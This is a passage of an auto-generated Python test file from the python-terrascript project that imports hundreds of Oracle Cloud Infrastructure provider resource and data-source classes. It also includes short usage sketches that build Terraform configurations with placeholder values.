fe230d64c86f08076ff21742bf942a3f535b2541 | 83,841 | py | Python | tests/test_provider_hashicorp_oci.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | ["BSD-2-Clause"] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | tests/test_provider_hashicorp_oci.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | ["BSD-2-Clause"] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | tests/test_provider_hashicorp_oci.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | ["BSD-2-Clause"] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z
# tests/test_provider_hashicorp_oci.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:23:14 UTC)
def test_provider_import():
import terrascript.provider.hashicorp.oci
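# Usage sketch (not part of the generated test suite): a minimal example of how
# the imported oci provider module is typically combined with terrascript to
# build a Terraform configuration. It assumes the provider class is exposed as
# `oci` inside terrascript.provider.hashicorp.oci, mirroring the import style
# used in the generated tests; the tenancy OCID and region are placeholders.
def example_oci_provider_block():
    import terrascript
    import terrascript.provider.hashicorp.oci as oci_provider

    config = terrascript.Terrascript()
    # Register the OCI provider block with placeholder credentials.
    config += oci_provider.oci(
        tenancy_ocid="ocid1.tenancy.oc1..example",  # placeholder value
        region="us-ashburn-1",                      # placeholder value
    )
    # str(config) is assumed to render the accumulated blocks as Terraform
    # JSON, which is how python-terrascript configurations are consumed.
    return str(config)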
def test_resource_import():
from terrascript.resource.hashicorp.oci import (
oci_ai_anomaly_detection_ai_private_endpoint,
)
from terrascript.resource.hashicorp.oci import oci_ai_anomaly_detection_data_asset
from terrascript.resource.hashicorp.oci import oci_ai_anomaly_detection_model
from terrascript.resource.hashicorp.oci import oci_ai_anomaly_detection_project
from terrascript.resource.hashicorp.oci import oci_analytics_analytics_instance
from terrascript.resource.hashicorp.oci import (
oci_analytics_analytics_instance_private_access_channel,
)
from terrascript.resource.hashicorp.oci import (
oci_analytics_analytics_instance_vanity_url,
)
from terrascript.resource.hashicorp.oci import oci_apigateway_api
from terrascript.resource.hashicorp.oci import oci_apigateway_certificate
from terrascript.resource.hashicorp.oci import oci_apigateway_deployment
from terrascript.resource.hashicorp.oci import oci_apigateway_gateway
from terrascript.resource.hashicorp.oci import oci_apm_apm_domain
from terrascript.resource.hashicorp.oci import oci_apm_synthetics_monitor
from terrascript.resource.hashicorp.oci import oci_apm_synthetics_script
from terrascript.resource.hashicorp.oci import oci_artifacts_container_configuration
from terrascript.resource.hashicorp.oci import (
oci_artifacts_container_image_signature,
)
from terrascript.resource.hashicorp.oci import oci_artifacts_container_repository
from terrascript.resource.hashicorp.oci import oci_artifacts_generic_artifact
from terrascript.resource.hashicorp.oci import oci_artifacts_repository
from terrascript.resource.hashicorp.oci import oci_audit_configuration
from terrascript.resource.hashicorp.oci import (
oci_autoscaling_auto_scaling_configuration,
)
from terrascript.resource.hashicorp.oci import oci_bastion_bastion
from terrascript.resource.hashicorp.oci import oci_bastion_session
from terrascript.resource.hashicorp.oci import oci_bds_auto_scaling_configuration
from terrascript.resource.hashicorp.oci import oci_bds_bds_instance
from terrascript.resource.hashicorp.oci import oci_blockchain_blockchain_platform
from terrascript.resource.hashicorp.oci import oci_blockchain_osn
from terrascript.resource.hashicorp.oci import oci_blockchain_peer
from terrascript.resource.hashicorp.oci import oci_budget_alert_rule
from terrascript.resource.hashicorp.oci import oci_budget_budget
from terrascript.resource.hashicorp.oci import (
oci_cloud_guard_cloud_guard_configuration,
)
from terrascript.resource.hashicorp.oci import oci_cloud_guard_data_mask_rule
from terrascript.resource.hashicorp.oci import oci_cloud_guard_detector_recipe
from terrascript.resource.hashicorp.oci import oci_cloud_guard_managed_list
from terrascript.resource.hashicorp.oci import oci_cloud_guard_responder_recipe
from terrascript.resource.hashicorp.oci import oci_cloud_guard_target
from terrascript.resource.hashicorp.oci import oci_containerengine_cluster
from terrascript.resource.hashicorp.oci import oci_containerengine_node_pool
from terrascript.resource.hashicorp.oci import (
oci_core_app_catalog_listing_resource_version_agreement,
)
from terrascript.resource.hashicorp.oci import oci_core_app_catalog_subscription
from terrascript.resource.hashicorp.oci import oci_core_boot_volume
from terrascript.resource.hashicorp.oci import oci_core_boot_volume_backup
from terrascript.resource.hashicorp.oci import oci_core_cluster_network
from terrascript.resource.hashicorp.oci import oci_core_compute_capacity_reservation
from terrascript.resource.hashicorp.oci import (
oci_core_compute_image_capability_schema,
)
from terrascript.resource.hashicorp.oci import oci_core_console_history
from terrascript.resource.hashicorp.oci import oci_core_cpe
from terrascript.resource.hashicorp.oci import oci_core_cross_connect
from terrascript.resource.hashicorp.oci import oci_core_cross_connect_group
from terrascript.resource.hashicorp.oci import oci_core_dedicated_vm_host
from terrascript.resource.hashicorp.oci import oci_core_default_dhcp_options
from terrascript.resource.hashicorp.oci import oci_core_default_route_table
from terrascript.resource.hashicorp.oci import oci_core_default_security_list
from terrascript.resource.hashicorp.oci import oci_core_dhcp_options
from terrascript.resource.hashicorp.oci import oci_core_drg
from terrascript.resource.hashicorp.oci import oci_core_drg_attachment
from terrascript.resource.hashicorp.oci import oci_core_drg_attachment_management
from terrascript.resource.hashicorp.oci import oci_core_drg_attachments_list
from terrascript.resource.hashicorp.oci import oci_core_drg_route_distribution
from terrascript.resource.hashicorp.oci import (
oci_core_drg_route_distribution_statement,
)
from terrascript.resource.hashicorp.oci import oci_core_drg_route_table
from terrascript.resource.hashicorp.oci import oci_core_drg_route_table_route_rule
from terrascript.resource.hashicorp.oci import oci_core_image
from terrascript.resource.hashicorp.oci import oci_core_instance
from terrascript.resource.hashicorp.oci import oci_core_instance_configuration
from terrascript.resource.hashicorp.oci import oci_core_instance_console_connection
from terrascript.resource.hashicorp.oci import oci_core_instance_pool
from terrascript.resource.hashicorp.oci import oci_core_instance_pool_instance
from terrascript.resource.hashicorp.oci import oci_core_internet_gateway
from terrascript.resource.hashicorp.oci import oci_core_ipsec
from terrascript.resource.hashicorp.oci import (
oci_core_ipsec_connection_tunnel_management,
)
from terrascript.resource.hashicorp.oci import oci_core_ipv6
from terrascript.resource.hashicorp.oci import (
oci_core_listing_resource_version_agreement,
)
from terrascript.resource.hashicorp.oci import oci_core_local_peering_gateway
from terrascript.resource.hashicorp.oci import oci_core_nat_gateway
from terrascript.resource.hashicorp.oci import oci_core_network_security_group
from terrascript.resource.hashicorp.oci import (
oci_core_network_security_group_security_rule,
)
from terrascript.resource.hashicorp.oci import oci_core_private_ip
from terrascript.resource.hashicorp.oci import oci_core_public_ip
from terrascript.resource.hashicorp.oci import oci_core_public_ip_pool
from terrascript.resource.hashicorp.oci import oci_core_public_ip_pool_capacity
from terrascript.resource.hashicorp.oci import oci_core_remote_peering_connection
from terrascript.resource.hashicorp.oci import oci_core_route_table
from terrascript.resource.hashicorp.oci import oci_core_route_table_attachment
from terrascript.resource.hashicorp.oci import oci_core_security_list
from terrascript.resource.hashicorp.oci import oci_core_service_gateway
from terrascript.resource.hashicorp.oci import oci_core_shape_management
from terrascript.resource.hashicorp.oci import oci_core_subnet
from terrascript.resource.hashicorp.oci import oci_core_vcn
from terrascript.resource.hashicorp.oci import oci_core_virtual_circuit
from terrascript.resource.hashicorp.oci import oci_core_virtual_network
from terrascript.resource.hashicorp.oci import oci_core_vlan
from terrascript.resource.hashicorp.oci import oci_core_vnic_attachment
from terrascript.resource.hashicorp.oci import oci_core_volume
from terrascript.resource.hashicorp.oci import oci_core_volume_attachment
from terrascript.resource.hashicorp.oci import oci_core_volume_backup
from terrascript.resource.hashicorp.oci import oci_core_volume_backup_policy
from terrascript.resource.hashicorp.oci import (
oci_core_volume_backup_policy_assignment,
)
from terrascript.resource.hashicorp.oci import oci_core_volume_group
from terrascript.resource.hashicorp.oci import oci_core_volume_group_backup
from terrascript.resource.hashicorp.oci import oci_data_safe_data_safe_configuration
from terrascript.resource.hashicorp.oci import (
oci_data_safe_data_safe_private_endpoint,
)
from terrascript.resource.hashicorp.oci import oci_data_safe_on_prem_connector
from terrascript.resource.hashicorp.oci import oci_data_safe_target_database
from terrascript.resource.hashicorp.oci import (
oci_database_autonomous_container_database,
)
from terrascript.resource.hashicorp.oci import (
oci_database_autonomous_container_database_dataguard_association_operation,
)
from terrascript.resource.hashicorp.oci import oci_database_autonomous_database
from terrascript.resource.hashicorp.oci import (
oci_database_autonomous_database_backup,
)
from terrascript.resource.hashicorp.oci import (
oci_database_autonomous_database_instance_wallet_management,
)
from terrascript.resource.hashicorp.oci import (
oci_database_autonomous_database_regional_wallet_management,
)
from terrascript.resource.hashicorp.oci import (
oci_database_autonomous_database_wallet,
)
from terrascript.resource.hashicorp.oci import (
oci_database_autonomous_exadata_infrastructure,
)
from terrascript.resource.hashicorp.oci import oci_database_autonomous_vm_cluster
from terrascript.resource.hashicorp.oci import oci_database_backup
from terrascript.resource.hashicorp.oci import oci_database_backup_destination
from terrascript.resource.hashicorp.oci import (
oci_database_cloud_database_management,
)
from terrascript.resource.hashicorp.oci import (
oci_database_cloud_exadata_infrastructure,
)
from terrascript.resource.hashicorp.oci import oci_database_cloud_vm_cluster
from terrascript.resource.hashicorp.oci import oci_database_data_guard_association
from terrascript.resource.hashicorp.oci import oci_database_database
from terrascript.resource.hashicorp.oci import oci_database_database_software_image
from terrascript.resource.hashicorp.oci import oci_database_database_upgrade
from terrascript.resource.hashicorp.oci import oci_database_db_home
from terrascript.resource.hashicorp.oci import (
oci_database_db_node_console_connection,
)
from terrascript.resource.hashicorp.oci import oci_database_db_system
from terrascript.resource.hashicorp.oci import oci_database_exadata_infrastructure
from terrascript.resource.hashicorp.oci import (
oci_database_exadata_infrastructure_storage,
)
from terrascript.resource.hashicorp.oci import oci_database_exadata_iorm_config
from terrascript.resource.hashicorp.oci import (
oci_database_external_container_database,
)
from terrascript.resource.hashicorp.oci import (
oci_database_external_container_database_management,
)
from terrascript.resource.hashicorp.oci import (
oci_database_external_database_connector,
)
from terrascript.resource.hashicorp.oci import (
oci_database_external_non_container_database,
)
from terrascript.resource.hashicorp.oci import (
oci_database_external_non_container_database_management,
)
from terrascript.resource.hashicorp.oci import (
oci_database_external_non_container_database_operations_insights_management,
)
from terrascript.resource.hashicorp.oci import (
oci_database_external_pluggable_database,
)
from terrascript.resource.hashicorp.oci import (
oci_database_external_pluggable_database_management,
)
from terrascript.resource.hashicorp.oci import (
oci_database_external_pluggable_database_operations_insights_management,
)
from terrascript.resource.hashicorp.oci import oci_database_key_store
from terrascript.resource.hashicorp.oci import oci_database_maintenance_run
from terrascript.resource.hashicorp.oci import (
oci_database_management_db_management_private_endpoint,
)
from terrascript.resource.hashicorp.oci import (
oci_database_management_managed_database_group,
)
from terrascript.resource.hashicorp.oci import (
oci_database_management_managed_databases_change_database_parameter,
)
from terrascript.resource.hashicorp.oci import (
oci_database_management_managed_databases_reset_database_parameter,
)
from terrascript.resource.hashicorp.oci import oci_database_migration
from terrascript.resource.hashicorp.oci import oci_database_migration_agent
from terrascript.resource.hashicorp.oci import oci_database_migration_connection
from terrascript.resource.hashicorp.oci import oci_database_migration_job
from terrascript.resource.hashicorp.oci import oci_database_migration_migration
from terrascript.resource.hashicorp.oci import oci_database_pluggable_database
from terrascript.resource.hashicorp.oci import (
oci_database_pluggable_databases_local_clone,
)
from terrascript.resource.hashicorp.oci import (
oci_database_pluggable_databases_remote_clone,
)
from terrascript.resource.hashicorp.oci import oci_database_vm_cluster
from terrascript.resource.hashicorp.oci import oci_database_vm_cluster_network
from terrascript.resource.hashicorp.oci import oci_datacatalog_catalog
from terrascript.resource.hashicorp.oci import (
oci_datacatalog_catalog_private_endpoint,
)
from terrascript.resource.hashicorp.oci import oci_datacatalog_connection
from terrascript.resource.hashicorp.oci import oci_datacatalog_data_asset
from terrascript.resource.hashicorp.oci import oci_datacatalog_metastore
from terrascript.resource.hashicorp.oci import oci_dataflow_application
from terrascript.resource.hashicorp.oci import oci_dataflow_invoke_run
from terrascript.resource.hashicorp.oci import oci_dataflow_private_endpoint
from terrascript.resource.hashicorp.oci import oci_dataintegration_workspace
from terrascript.resource.hashicorp.oci import oci_datascience_job
from terrascript.resource.hashicorp.oci import oci_datascience_job_run
from terrascript.resource.hashicorp.oci import oci_datascience_model
from terrascript.resource.hashicorp.oci import oci_datascience_model_deployment
from terrascript.resource.hashicorp.oci import oci_datascience_model_provenance
from terrascript.resource.hashicorp.oci import oci_datascience_notebook_session
from terrascript.resource.hashicorp.oci import oci_datascience_project
from terrascript.resource.hashicorp.oci import oci_devops_deploy_artifact
from terrascript.resource.hashicorp.oci import oci_devops_deploy_environment
from terrascript.resource.hashicorp.oci import oci_devops_deploy_pipeline
from terrascript.resource.hashicorp.oci import oci_devops_deploy_stage
from terrascript.resource.hashicorp.oci import oci_devops_deployment
from terrascript.resource.hashicorp.oci import oci_devops_project
from terrascript.resource.hashicorp.oci import oci_dns_record
from terrascript.resource.hashicorp.oci import oci_dns_resolver
from terrascript.resource.hashicorp.oci import oci_dns_resolver_endpoint
from terrascript.resource.hashicorp.oci import oci_dns_rrset
from terrascript.resource.hashicorp.oci import oci_dns_steering_policy
from terrascript.resource.hashicorp.oci import oci_dns_steering_policy_attachment
from terrascript.resource.hashicorp.oci import oci_dns_tsig_key
from terrascript.resource.hashicorp.oci import oci_dns_view
from terrascript.resource.hashicorp.oci import oci_dns_zone
from terrascript.resource.hashicorp.oci import oci_email_dkim
from terrascript.resource.hashicorp.oci import oci_email_email_domain
from terrascript.resource.hashicorp.oci import oci_email_sender
from terrascript.resource.hashicorp.oci import oci_email_suppression
from terrascript.resource.hashicorp.oci import oci_events_rule
from terrascript.resource.hashicorp.oci import oci_file_storage_export
from terrascript.resource.hashicorp.oci import oci_file_storage_export_set
from terrascript.resource.hashicorp.oci import oci_file_storage_file_system
from terrascript.resource.hashicorp.oci import oci_file_storage_mount_target
from terrascript.resource.hashicorp.oci import oci_file_storage_snapshot
from terrascript.resource.hashicorp.oci import oci_functions_application
from terrascript.resource.hashicorp.oci import oci_functions_function
from terrascript.resource.hashicorp.oci import oci_functions_invoke_function
from terrascript.resource.hashicorp.oci import (
oci_generic_artifacts_content_artifact_by_path,
)
from terrascript.resource.hashicorp.oci import oci_golden_gate_database_registration
from terrascript.resource.hashicorp.oci import oci_golden_gate_deployment
from terrascript.resource.hashicorp.oci import oci_golden_gate_deployment_backup
from terrascript.resource.hashicorp.oci import oci_health_checks_http_monitor
from terrascript.resource.hashicorp.oci import oci_health_checks_http_probe
from terrascript.resource.hashicorp.oci import oci_health_checks_ping_monitor
from terrascript.resource.hashicorp.oci import oci_health_checks_ping_probe
from terrascript.resource.hashicorp.oci import oci_identity_api_key
from terrascript.resource.hashicorp.oci import oci_identity_auth_token
from terrascript.resource.hashicorp.oci import oci_identity_authentication_policy
from terrascript.resource.hashicorp.oci import oci_identity_compartment
from terrascript.resource.hashicorp.oci import oci_identity_customer_secret_key
from terrascript.resource.hashicorp.oci import oci_identity_dynamic_group
from terrascript.resource.hashicorp.oci import oci_identity_group
from terrascript.resource.hashicorp.oci import oci_identity_identity_provider
from terrascript.resource.hashicorp.oci import oci_identity_idp_group_mapping
from terrascript.resource.hashicorp.oci import oci_identity_network_source
from terrascript.resource.hashicorp.oci import oci_identity_policy
from terrascript.resource.hashicorp.oci import oci_identity_smtp_credential
from terrascript.resource.hashicorp.oci import oci_identity_swift_password
from terrascript.resource.hashicorp.oci import oci_identity_tag
from terrascript.resource.hashicorp.oci import oci_identity_tag_default
from terrascript.resource.hashicorp.oci import oci_identity_tag_namespace
from terrascript.resource.hashicorp.oci import oci_identity_ui_password
from terrascript.resource.hashicorp.oci import oci_identity_user
from terrascript.resource.hashicorp.oci import (
oci_identity_user_capabilities_management,
)
from terrascript.resource.hashicorp.oci import oci_identity_user_group_membership
from terrascript.resource.hashicorp.oci import oci_integration_integration_instance
from terrascript.resource.hashicorp.oci import oci_jms_fleet
from terrascript.resource.hashicorp.oci import oci_kms_encrypted_data
from terrascript.resource.hashicorp.oci import oci_kms_generated_key
from terrascript.resource.hashicorp.oci import oci_kms_key
from terrascript.resource.hashicorp.oci import oci_kms_key_version
from terrascript.resource.hashicorp.oci import oci_kms_sign
from terrascript.resource.hashicorp.oci import oci_kms_vault
from terrascript.resource.hashicorp.oci import oci_kms_vault_replication
from terrascript.resource.hashicorp.oci import oci_kms_verify
from terrascript.resource.hashicorp.oci import oci_limits_quota
from terrascript.resource.hashicorp.oci import oci_load_balancer
from terrascript.resource.hashicorp.oci import oci_load_balancer_backend
from terrascript.resource.hashicorp.oci import oci_load_balancer_backend_set
from terrascript.resource.hashicorp.oci import oci_load_balancer_backendset
from terrascript.resource.hashicorp.oci import oci_load_balancer_certificate
from terrascript.resource.hashicorp.oci import oci_load_balancer_hostname
from terrascript.resource.hashicorp.oci import oci_load_balancer_listener
from terrascript.resource.hashicorp.oci import oci_load_balancer_load_balancer
from terrascript.resource.hashicorp.oci import (
oci_load_balancer_load_balancer_routing_policy,
)
from terrascript.resource.hashicorp.oci import oci_load_balancer_path_route_set
from terrascript.resource.hashicorp.oci import oci_load_balancer_rule_set
from terrascript.resource.hashicorp.oci import oci_load_balancer_ssl_cipher_suite
from terrascript.resource.hashicorp.oci import (
oci_log_analytics_log_analytics_entity,
)
from terrascript.resource.hashicorp.oci import (
oci_log_analytics_log_analytics_import_custom_content,
)
from terrascript.resource.hashicorp.oci import (
oci_log_analytics_log_analytics_log_group,
)
from terrascript.resource.hashicorp.oci import (
oci_log_analytics_log_analytics_object_collection_rule,
)
from terrascript.resource.hashicorp.oci import oci_log_analytics_namespace
from terrascript.resource.hashicorp.oci import oci_logging_log
from terrascript.resource.hashicorp.oci import oci_logging_log_group
from terrascript.resource.hashicorp.oci import oci_logging_log_saved_search
from terrascript.resource.hashicorp.oci import (
oci_logging_unified_agent_configuration,
)
from terrascript.resource.hashicorp.oci import oci_management_agent_management_agent
from terrascript.resource.hashicorp.oci import (
oci_management_agent_management_agent_install_key,
)
from terrascript.resource.hashicorp.oci import (
oci_management_dashboard_management_dashboards_import,
)
from terrascript.resource.hashicorp.oci import oci_marketplace_accepted_agreement
from terrascript.resource.hashicorp.oci import (
oci_marketplace_listing_package_agreement,
)
from terrascript.resource.hashicorp.oci import oci_marketplace_publication
from terrascript.resource.hashicorp.oci import oci_metering_computation_custom_table
from terrascript.resource.hashicorp.oci import oci_metering_computation_query
from terrascript.resource.hashicorp.oci import oci_metering_computation_usage
from terrascript.resource.hashicorp.oci import oci_monitoring_alarm
from terrascript.resource.hashicorp.oci import oci_mysql_analytics_cluster
from terrascript.resource.hashicorp.oci import oci_mysql_channel
from terrascript.resource.hashicorp.oci import oci_mysql_heat_wave_cluster
from terrascript.resource.hashicorp.oci import oci_mysql_mysql_backup
from terrascript.resource.hashicorp.oci import oci_mysql_mysql_db_system
from terrascript.resource.hashicorp.oci import oci_network_load_balancer_backend
from terrascript.resource.hashicorp.oci import oci_network_load_balancer_backend_set
from terrascript.resource.hashicorp.oci import oci_network_load_balancer_listener
from terrascript.resource.hashicorp.oci import (
oci_network_load_balancer_network_load_balancer,
)
from terrascript.resource.hashicorp.oci import oci_nosql_index
from terrascript.resource.hashicorp.oci import oci_nosql_table
from terrascript.resource.hashicorp.oci import oci_objectstorage_bucket
from terrascript.resource.hashicorp.oci import oci_objectstorage_namespace_metadata
from terrascript.resource.hashicorp.oci import oci_objectstorage_object
from terrascript.resource.hashicorp.oci import (
oci_objectstorage_object_lifecycle_policy,
)
from terrascript.resource.hashicorp.oci import oci_objectstorage_preauthrequest
from terrascript.resource.hashicorp.oci import oci_objectstorage_replication_policy
from terrascript.resource.hashicorp.oci import oci_oce_oce_instance
from terrascript.resource.hashicorp.oci import oci_ocvp_esxi_host
from terrascript.resource.hashicorp.oci import oci_ocvp_sddc
from terrascript.resource.hashicorp.oci import oci_oda_oda_instance
from terrascript.resource.hashicorp.oci import oci_ons_notification_topic
from terrascript.resource.hashicorp.oci import oci_ons_subscription
from terrascript.resource.hashicorp.oci import oci_opsi_database_insight
from terrascript.resource.hashicorp.oci import oci_opsi_enterprise_manager_bridge
from terrascript.resource.hashicorp.oci import oci_opsi_host_insight
from terrascript.resource.hashicorp.oci import oci_optimizer_enrollment_status
from terrascript.resource.hashicorp.oci import oci_optimizer_profile
from terrascript.resource.hashicorp.oci import oci_optimizer_recommendation
from terrascript.resource.hashicorp.oci import oci_optimizer_resource_action
from terrascript.resource.hashicorp.oci import oci_osmanagement_managed_instance
from terrascript.resource.hashicorp.oci import (
oci_osmanagement_managed_instance_group,
)
from terrascript.resource.hashicorp.oci import (
oci_osmanagement_managed_instance_management,
)
from terrascript.resource.hashicorp.oci import oci_osmanagement_software_source
from terrascript.resource.hashicorp.oci import oci_sch_service_connector
from terrascript.resource.hashicorp.oci import (
oci_service_catalog_private_application,
)
from terrascript.resource.hashicorp.oci import oci_service_catalog_service_catalog
from terrascript.resource.hashicorp.oci import (
oci_service_catalog_service_catalog_association,
)
from terrascript.resource.hashicorp.oci import oci_streaming_connect_harness
from terrascript.resource.hashicorp.oci import oci_streaming_stream
from terrascript.resource.hashicorp.oci import oci_streaming_stream_pool
from terrascript.resource.hashicorp.oci import (
oci_vulnerability_scanning_container_scan_recipe,
)
from terrascript.resource.hashicorp.oci import (
oci_vulnerability_scanning_container_scan_target,
)
from terrascript.resource.hashicorp.oci import (
oci_vulnerability_scanning_host_scan_recipe,
)
from terrascript.resource.hashicorp.oci import (
oci_vulnerability_scanning_host_scan_target,
)
from terrascript.resource.hashicorp.oci import oci_waas_address_list
from terrascript.resource.hashicorp.oci import oci_waas_certificate
from terrascript.resource.hashicorp.oci import oci_waas_custom_protection_rule
from terrascript.resource.hashicorp.oci import oci_waas_http_redirect
from terrascript.resource.hashicorp.oci import oci_waas_protection_rule
from terrascript.resource.hashicorp.oci import oci_waas_purge_cache
from terrascript.resource.hashicorp.oci import oci_waas_waas_policy
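

# Illustrative sketch only (not collected by pytest, hence no "test_" prefix):
# it shows how one of the resource classes imported above could be used,
# assuming the documented python-terrascript pattern of building a
# Terrascript() configuration with "+=".  The resource label "example_vcn",
# the CIDR block and the compartment OCID are placeholder values.
def _example_resource_usage():
    import terrascript
    from terrascript.resource.hashicorp.oci import oci_core_vcn

    config = terrascript.Terrascript()
    config += oci_core_vcn(
        "example_vcn",
        cidr_block="10.0.0.0/16",
        compartment_id="ocid1.compartment.oc1..example",
    )

    # The rendered configuration should mention both the resource type and
    # the chosen resource label.
    assert "oci_core_vcn" in str(config)
    assert "example_vcn" in str(config)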


def test_datasource_import():
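    # Import every generated OCI data-source class once so that a missing or
    # renamed binding in terrascript.data.hashicorp.oci raises ImportError and
    # fails this test.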
from terrascript.data.hashicorp.oci import (
oci_ai_anomaly_detection_ai_private_endpoint,
)
from terrascript.data.hashicorp.oci import (
oci_ai_anomaly_detection_ai_private_endpoints,
)
from terrascript.data.hashicorp.oci import oci_ai_anomaly_detection_data_asset
from terrascript.data.hashicorp.oci import oci_ai_anomaly_detection_data_assets
from terrascript.data.hashicorp.oci import oci_ai_anomaly_detection_model
from terrascript.data.hashicorp.oci import oci_ai_anomaly_detection_models
from terrascript.data.hashicorp.oci import oci_ai_anomaly_detection_project
from terrascript.data.hashicorp.oci import oci_ai_anomaly_detection_projects
from terrascript.data.hashicorp.oci import oci_analytics_analytics_instance
from terrascript.data.hashicorp.oci import (
oci_analytics_analytics_instance_private_access_channel,
)
from terrascript.data.hashicorp.oci import oci_analytics_analytics_instances
from terrascript.data.hashicorp.oci import oci_apigateway_api
from terrascript.data.hashicorp.oci import oci_apigateway_api_content
from terrascript.data.hashicorp.oci import (
oci_apigateway_api_deployment_specification,
)
from terrascript.data.hashicorp.oci import oci_apigateway_api_validation
from terrascript.data.hashicorp.oci import oci_apigateway_apis
from terrascript.data.hashicorp.oci import oci_apigateway_certificate
from terrascript.data.hashicorp.oci import oci_apigateway_certificates
from terrascript.data.hashicorp.oci import oci_apigateway_deployment
from terrascript.data.hashicorp.oci import oci_apigateway_deployments
from terrascript.data.hashicorp.oci import oci_apigateway_gateway
from terrascript.data.hashicorp.oci import oci_apigateway_gateways
from terrascript.data.hashicorp.oci import oci_apm_apm_domain
from terrascript.data.hashicorp.oci import oci_apm_apm_domains
from terrascript.data.hashicorp.oci import oci_apm_data_keys
from terrascript.data.hashicorp.oci import oci_apm_synthetics_monitor
from terrascript.data.hashicorp.oci import oci_apm_synthetics_monitors
from terrascript.data.hashicorp.oci import oci_apm_synthetics_public_vantage_point
from terrascript.data.hashicorp.oci import oci_apm_synthetics_public_vantage_points
from terrascript.data.hashicorp.oci import oci_apm_synthetics_result
from terrascript.data.hashicorp.oci import oci_apm_synthetics_script
from terrascript.data.hashicorp.oci import oci_apm_synthetics_scripts
from terrascript.data.hashicorp.oci import oci_artifacts_container_configuration
from terrascript.data.hashicorp.oci import oci_artifacts_container_image
from terrascript.data.hashicorp.oci import oci_artifacts_container_image_signature
from terrascript.data.hashicorp.oci import oci_artifacts_container_image_signatures
from terrascript.data.hashicorp.oci import oci_artifacts_container_images
from terrascript.data.hashicorp.oci import oci_artifacts_container_repositories
from terrascript.data.hashicorp.oci import oci_artifacts_container_repository
from terrascript.data.hashicorp.oci import oci_artifacts_generic_artifact
from terrascript.data.hashicorp.oci import oci_artifacts_generic_artifacts
from terrascript.data.hashicorp.oci import oci_artifacts_repositories
from terrascript.data.hashicorp.oci import oci_artifacts_repository
from terrascript.data.hashicorp.oci import oci_audit_configuration
from terrascript.data.hashicorp.oci import oci_audit_events
from terrascript.data.hashicorp.oci import (
oci_autoscaling_auto_scaling_configuration,
)
from terrascript.data.hashicorp.oci import (
oci_autoscaling_auto_scaling_configurations,
)
from terrascript.data.hashicorp.oci import oci_bastion_bastion
from terrascript.data.hashicorp.oci import oci_bastion_bastions
from terrascript.data.hashicorp.oci import oci_bastion_session
from terrascript.data.hashicorp.oci import oci_bastion_sessions
from terrascript.data.hashicorp.oci import oci_bds_auto_scaling_configuration
from terrascript.data.hashicorp.oci import oci_bds_auto_scaling_configurations
from terrascript.data.hashicorp.oci import oci_bds_bds_instance
from terrascript.data.hashicorp.oci import oci_bds_bds_instances
from terrascript.data.hashicorp.oci import oci_blockchain_blockchain_platform
from terrascript.data.hashicorp.oci import oci_blockchain_blockchain_platforms
from terrascript.data.hashicorp.oci import oci_blockchain_osn
from terrascript.data.hashicorp.oci import oci_blockchain_osns
from terrascript.data.hashicorp.oci import oci_blockchain_peer
from terrascript.data.hashicorp.oci import oci_blockchain_peers
from terrascript.data.hashicorp.oci import oci_budget_alert_rule
from terrascript.data.hashicorp.oci import oci_budget_alert_rules
from terrascript.data.hashicorp.oci import oci_budget_budget
from terrascript.data.hashicorp.oci import oci_budget_budgets
from terrascript.data.hashicorp.oci import oci_cloud_guard_cloud_guard_configuration
from terrascript.data.hashicorp.oci import oci_cloud_guard_data_mask_rule
from terrascript.data.hashicorp.oci import oci_cloud_guard_data_mask_rules
from terrascript.data.hashicorp.oci import oci_cloud_guard_detector_recipe
from terrascript.data.hashicorp.oci import oci_cloud_guard_detector_recipes
from terrascript.data.hashicorp.oci import oci_cloud_guard_managed_list
from terrascript.data.hashicorp.oci import oci_cloud_guard_managed_lists
from terrascript.data.hashicorp.oci import oci_cloud_guard_responder_recipe
from terrascript.data.hashicorp.oci import oci_cloud_guard_responder_recipes
from terrascript.data.hashicorp.oci import oci_cloud_guard_target
from terrascript.data.hashicorp.oci import oci_cloud_guard_targets
from terrascript.data.hashicorp.oci import (
oci_computeinstanceagent_instance_agent_plugin,
)
from terrascript.data.hashicorp.oci import (
oci_computeinstanceagent_instance_agent_plugins,
)
from terrascript.data.hashicorp.oci import (
oci_computeinstanceagent_instance_available_plugins,
)
from terrascript.data.hashicorp.oci import oci_containerengine_cluster_kube_config
from terrascript.data.hashicorp.oci import oci_containerengine_cluster_option
from terrascript.data.hashicorp.oci import oci_containerengine_clusters
from terrascript.data.hashicorp.oci import (
oci_containerengine_migrate_to_native_vcn_status,
)
from terrascript.data.hashicorp.oci import oci_containerengine_node_pool
from terrascript.data.hashicorp.oci import oci_containerengine_node_pool_option
from terrascript.data.hashicorp.oci import oci_containerengine_node_pools
from terrascript.data.hashicorp.oci import oci_containerengine_work_request_errors
from terrascript.data.hashicorp.oci import (
oci_containerengine_work_request_log_entries,
)
from terrascript.data.hashicorp.oci import oci_containerengine_work_requests
from terrascript.data.hashicorp.oci import oci_core_app_catalog_listing
from terrascript.data.hashicorp.oci import (
oci_core_app_catalog_listing_resource_version,
)
from terrascript.data.hashicorp.oci import (
oci_core_app_catalog_listing_resource_versions,
)
from terrascript.data.hashicorp.oci import oci_core_app_catalog_listings
from terrascript.data.hashicorp.oci import oci_core_app_catalog_subscriptions
from terrascript.data.hashicorp.oci import oci_core_block_volume_replica
from terrascript.data.hashicorp.oci import oci_core_block_volume_replicas
from terrascript.data.hashicorp.oci import oci_core_boot_volume
from terrascript.data.hashicorp.oci import oci_core_boot_volume_attachments
from terrascript.data.hashicorp.oci import oci_core_boot_volume_backup
from terrascript.data.hashicorp.oci import oci_core_boot_volume_backups
from terrascript.data.hashicorp.oci import oci_core_boot_volume_replica
from terrascript.data.hashicorp.oci import oci_core_boot_volume_replicas
from terrascript.data.hashicorp.oci import oci_core_boot_volumes
from terrascript.data.hashicorp.oci import oci_core_byoip_allocated_ranges
from terrascript.data.hashicorp.oci import oci_core_byoip_range
from terrascript.data.hashicorp.oci import oci_core_byoip_ranges
from terrascript.data.hashicorp.oci import oci_core_cluster_network
from terrascript.data.hashicorp.oci import oci_core_cluster_network_instances
